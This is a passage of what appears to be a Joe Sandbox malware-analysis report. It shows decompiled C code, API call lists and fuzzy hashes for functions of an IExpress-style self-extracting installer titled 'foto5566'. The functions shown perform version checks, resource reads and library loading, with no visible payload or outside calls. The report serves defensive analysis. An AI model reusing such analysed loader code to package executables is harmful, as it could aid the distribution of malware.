Instruction Fuzzy Hash: 3911D6313002C1AFD724AF73AC4DF1F3AB9DBD5750B10403EB946DE2A1DA799900A625

Uniqueness

Uniqueness Score: -1.00%

Function 00CE24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CE24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0xce8004; // 0xd1db73d
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E00CE658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00CE6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x00ce24e0
0x00ce24eb
0x00ce24f2
0x00ce24f7
0x00ce2504
0x00ce250e
0x00ce251d
0x00ce252c
0x00ce2541
0x00ce2546
0x00ce2553
0x00ce2555
0x00ce2555
0x00ce2546
0x00ce256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00CE2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00CE252C
_lopen.KERNEL32(?,00000040), ref: 00CE253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 00CE254C
_lclose.KERNEL32(00000000), ref: 00CE2555

Strings

wininit.ini, xrefs: 00CE2510

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 3b37d7a7b3049668e096b32d650e17b8b62f2ca59292ff5ef044dbf2216386c7
Instruction ID: a84c594d72e7ffcec24b494a5348b09996a862a2716f1817ef53a13143b4e4b1
Opcode Fuzzy Hash: 3b37d7a7b3049668e096b32d650e17b8b62f2ca59292ff5ef044dbf2216386c7
Instruction Fuzzy Hash: A501B132601198ABC7209BA69D4CFEFBB7CEB85760F000165FA4AD7190DE749E45CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CE36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0xce8004; // 0xd1db73d
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0xce8184 = 1;
						 *0xce8180 = 1;
						L13:
						 *0xce9a40 = _t119;
						L14:
						__eflags =  *0xce8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00CE2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00CE2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xce8a38 & 0x00000001;
											if(( *0xce8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("foto5566");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00CE681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "foto5566", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00CE67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00CE28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0xce9a40 = _t119;
						 *0xce8184 = 1;
						 *0xce8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0xce9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0xce8184 = _t135;
							 *0xce8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E00CE44B9(0, _t138);
					L66:
					return E00CE6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x00ce36f9
0x00ce3700
0x00ce370c
0x00ce3716
0x00ce3718
0x00ce371b
0x00ce3721
0x00ce372b
0x00ce373d
0x00ce3745
0x00ce3746
0x00ce3746
0x00ce3749
0x00ce37ab
0x00ce37ad
0x00ce37ae
0x00ce37b3
0x00ce37b8
0x00ce37b8
0x00ce37bf
0x00ce37bf
0x00ce37c5
0x00000000
0x00000000
0x00ce37cb
0x00ce37cd
0x00000000
0x00000000
0x00ce37d5
0x00ce37db
0x00ce37e8
0x00ce37ea
0x00ce37ea
0x00ce37ea
0x00ce37f0
0x00ce37f6
0x00ce3805
0x00ce3817
0x00ce382b
0x00ce3830
0x00ce3836
0x00ce383b
0x00ce383d
0x00ce38eb
0x00ce38eb
0x00ce38f2
0x00ce390c
0x00ce3911
0x00ce3911
0x00ce3913
0x00ce394d
0x00ce394d
0x00ce394f
0x00ce38a9
0x00ce38a9
0x00ce38b0
0x00ce38b2
0x00ce38b9
0x00ce38bb
0x00ce38c1
0x00ce3975
0x00ce38c7
0x00ce38de
0x00ce38e0
0x00ce38e0
0x00ce397b
0x00ce397d
0x00ce39a9
0x00ce397f
0x00ce3982
0x00ce398b
0x00ce398d
0x00ce398f
0x00ce399f
0x00ce39a1
0x00ce3991
0x00ce3991
0x00ce3991
0x00ce398f
0x00ce39af
0x00ce39b6
0x00ce3a0f
0x00ce3a0f
0x00ce3a11
0x00ce3a13
0x00ce3a19
0x00000000
0x00ce39b8
0x00ce39b8
0x00ce39ba
0x00000000
0x00000000
0x00ce39bc
0x00ce39bf
0x00000000
0x00000000
0x00ce39c3
0x00ce39c9
0x00ce39ce
0x00ce39d0
0x00ce39e3
0x00ce39e5
0x00ce39e6
0x00ce39f1
0x00ce39f7
0x00ce39fa
0x00ce3a01
0x00ce3a04
0x00000000
0x00000000
0x00ce3a06
0x00ce3a09
0x00ce3a09
0x00ce3a0b
0x00ce3a0b
0x00000000
0x00ce3a09
0x00ce39fc
0x00000000
0x00ce39fc
0x00ce39d3
0x00ce39d8
0x00ce39da
0x00000000
0x00000000
0x00000000
0x00ce39dc
0x00ce39b6
0x00ce3955
0x00ce395b
0x00000000
0x00000000
0x00ce3961
0x00ce3963
0x00000000
0x00000000
0x00ce3969
0x00ce3969
0x00000000
0x00ce3969
0x00ce3915
0x00ce3915
0x00ce391b
0x00ce391f
0x00000000
0x00000000
0x00ce392d
0x00ce3933
0x00ce3938
0x00ce393a
0x00000000
0x00000000
0x00ce3940
0x00ce3946
0x00ce394b
0x00000000
0x00ce394b
0x00000000
0x00ce38f2
0x00ce3843
0x00ce3845
0x00000000
0x00000000
0x00ce384b
0x00ce384d
0x00ce3883
0x00ce3885
0x00000000
0x00000000
0x00ce389a
0x00ce389e
0x00ce389e
0x00000000
0x00000000
0x00ce38a0
0x00ce38a0
0x00ce38a2
0x00000000
0x00000000
0x00ce38a4
0x00000000
0x00ce38a4
0x00ce384f
0x00ce3851
0x00ce3857
0x00ce386e
0x00ce3877
0x00ce387b
0x00000000
0x00000000
0x00000000
0x00ce3881
0x00ce3859
0x00ce385c
0x00ce3862
0x00ce3866
0x00000000
0x00000000
0x00ce3868
0x00000000
0x00ce38f4
0x00ce38f4
0x00ce38f5
0x00ce38fb
0x00ce3901
0x00ce3901
0x00000000
0x00ce390a
0x00ce374b
0x00ce374e
0x00ce375c
0x00ce3764
0x00ce3769
0x00ce376e
0x00ce3771
0x00ce379c
0x00ce379f
0x00000000
0x00000000
0x00ce37a3
0x00ce37a4
0x00000000
0x00ce37a4
0x00ce3773
0x00ce3777
0x00ce3778
0x00ce377f
0x00ce3781
0x00ce378e
0x00ce378e
0x00ce3794
0x00000000
0x00ce3794
0x00ce3783
0x00000000
0x00000000
0x00ce3785
0x00ce378c
0x00000000
0x00000000
0x00000000
0x00ce378c
0x00ce3750
0x00000000
0x00ce372d
0x00ce372d
0x00ce396b
0x00ce396b
0x00ce396c
0x00ce396e
0x00ce396f
0x00ce3a1e
0x00ce3a1e
0x00ce3a22
0x00ce3a27
0x00ce3a3e
0x00ce3a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00CE3723
MessageBeep.USER32(00000000), ref: 00CE39C3
MessageBoxA.USER32(00000000,00000000,foto5566,00000030), ref: 00CE39F1

Strings

3, xrefs: 00CE3785
foto5566, xrefs: 00CE39E9, 00CE3A19

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$foto5566
API String ID: 2519184315-4228617117
Opcode ID: d8292e74c3270df01e8ecd1e94da29de6e2a107850345ce03f99705e6ab6f677
Instruction ID: 814ef1c062d6183151bb1e0d81ecb3a56327148f722bd45cd058bd36e8f6f00f
Opcode Fuzzy Hash: d8292e74c3270df01e8ecd1e94da29de6e2a107850345ce03f99705e6ab6f677
Instruction Fuzzy Hash: 8D91F1B1A012E49BDB348A17CD897AE77B1EF85304F1500AAD8999B281DB75AF81DF01

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00CE6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0xce8004; // 0xd1db73d
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00CE1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
				_t26 = "advpack.dll";
				E00CE658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00CE6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00ce6495
0x00ce6495
0x00ce64a0
0x00ce64a7
0x00ce64ab
0x00ce64bd
0x00ce64c2
0x00ce64d3
0x00ce64df
0x00ce64e8
0x00ce6502
0x00ce64ee
0x00ce64f9
0x00ce64f9
0x00ce6516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00CE64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00CE64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00CE6502

Strings

advpack.dll, xrefs: 00CE64C2, 00CE64CD, 00CE6501
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE64AC

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
API String ID: 438848745-1655358546
Opcode ID: e770640a7ce3d99de4cd4cecd5c4d8fe5249ffaa4ac57ae99d64639dd197138c
Instruction ID: 402a3fadc809ec1d693dd7d5f759b0620d463efeff15af3538fb2a0c44c67a1f
Opcode Fuzzy Hash: e770640a7ce3d99de4cd4cecd5c4d8fe5249ffaa4ac57ae99d64639dd197138c
Instruction Fuzzy Hash: 6501F9706101889FDB50EB66DC89FEE7778DB60310F500195F5C6961C0DF70AE89CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00CE28E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00CE2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00CE2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00CE2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x00ce28f1
0x00ce28f4
0x00ce28f7
0x00ce28f9
0x00ce28fc
0x00ce28ff
0x00ce2901
0x00ce2907
0x00ce2a62
0x00ce2a64
0x00ce290d
0x00ce290d
0x00ce290f
0x00ce2912
0x00ce2920
0x00ce2937
0x00000000
0x00000000
0x00ce2944
0x00ce294a
0x00ce294f
0x00ce2a2f
0x00ce2a32
0x00ce2a34
0x00ce2a37
0x00ce2a41
0x00000000
0x00000000
0x00ce2955
0x00ce295e
0x00ce2962
0x00ce2969
0x00ce296f
0x00ce2974
0x00ce298c
0x00ce2a20
0x00ce2a21
0x00ce2a27
0x00ce2a4c
0x00ce2a4f
0x00ce2a50
0x00ce2a53
0x00ce2a56
0x00ce2a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce29b2
0x00ce29b2
0x00ce29b5
0x00ce29bd
0x00ce29c3
0x00ce29cc
0x00ce29d5
0x00ce29d7
0x00ce29da
0x00ce29dd
0x00ce29df
0x00ce29ec
0x00ce29f8
0x00ce29fc
0x00ce29ff
0x00ce2a02
0x00ce2a07
0x00ce2a0a
0x00ce2a0f
0x00ce2a19
0x00ce2a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce2a0f
0x00ce298c
0x00ce2974
0x00ce2962
0x00000000
0x00ce294f
0x00ce2912
0x00ce2a65
0x00ce2a68
0x00ce2a6c
0x00ce2a6f
0x00ce2a6f
0x00ce2a7d

APIs

GlobalFree.KERNEL32 ref: 00CE2A6F

Part of subcall function 00CE2773: CharUpperA.USER32(0D1DB73D,00000000,00000000,00000000), ref: 00CE27A8
Part of subcall function 00CE2773: CharNextA.USER32(0000054D), ref: 00CE27B5
Part of subcall function 00CE2773: CharNextA.USER32(00000000), ref: 00CE27BC
Part of subcall function 00CE2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00CE2829
Part of subcall function 00CE2773: RegQueryValueExA.ADVAPI32(?,00CE1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00CE2852
Part of subcall function 00CE2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00CE2870
Part of subcall function 00CE2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00CE28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00CE3938,?,?,?,?,-00000005), ref: 00CE2958
GlobalLock.KERNEL32 ref: 00CE2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00CE3938,?,?,?,?,-00000005,?), ref: 00CE2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00CE2A81

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: c7a239937caf688044373ea27437fe3b70f6e81b3e8618bea2699bb5054d345e
Instruction ID: 0c24f677a400ba973a242bab7e86f48ae5fb26164ff371e1a119ca7a3b073142
Opcode Fuzzy Hash: c7a239937caf688044373ea27437fe3b70f6e81b3e8618bea2699bb5054d345e
Instruction Fuzzy Hash: 6A512B31D00259DFCB25DF9AC884BAEFBB9FF48700F14406AE915E7211DB319A41EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00CE4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E00CE468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E00CE468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E00CE44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E00CE44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x00ce417d
0x00ce418f
0x00ce4193
0x00ce41b7
0x00ce41d3
0x00ce41e6
0x00000000
0x00ce41e7
0x00ce41d5
0x00ce41d6
0x00ce41d8
0x00ce41d9
0x00ce41da
0x00ce41df
0x00ce41e1
0x00000000
0x00ce41e1
0x00ce41b9
0x00ce41ba
0x00ce41bc
0x00ce41bd
0x00ce41be
0x00000000
0x00ce41be
0x00000000

APIs

Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46A0
Part of subcall function 00CE468F: SizeofResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46A9
Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46C3
Part of subcall function 00CE468F: LoadResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46CC
Part of subcall function 00CE468F: LockResource.KERNEL32(00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46D3
Part of subcall function 00CE468F: memcpy_s.MSVCRT ref: 00CE46E5
Part of subcall function 00CE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00CE30B4), ref: 00CE4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00CE30B4), ref: 00CE41E7

Part of subcall function 00CE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00CE4518
Part of subcall function 00CE44B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00CE4554

Strings

<None>, xrefs: 00CE41C5
FINISHMSG, xrefs: 00CE4173, 00CE41AB

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
